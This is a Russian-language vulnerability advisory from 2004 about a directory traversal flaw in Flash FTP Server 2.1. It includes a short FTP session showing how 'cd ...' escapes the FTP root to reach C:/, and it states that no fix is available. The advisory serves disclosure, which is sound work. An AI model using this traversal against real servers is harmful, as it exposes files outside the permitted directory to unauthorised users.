Просмотр произвольных файлов в Flash FTP Server
| Дата публикации: | 25.07.2004 |
| Всего просмотров: | 1247 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
|
Уязвимые версии: Flash FTP Server 2.1
Описание: Уязвимость в Flash FTP Server позволяет удаленному пользователю просматривать файлы на целевой системе расположенные вне FTp root каталога. Пример/Эксплоит: ftp> cd ... ---> CWD ... 250 CWD command successful. "C:/inetpub/ftproot/.../" is current directory. ftp> cd / ---> CWD / 501 Cannot accept relative path using dot notation ftp> pwd ---> XPWD 257 "/C:/" is current directory. URL производителя: http://net2soft.com/products/flashftpserver.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Bug@FlashFTPd |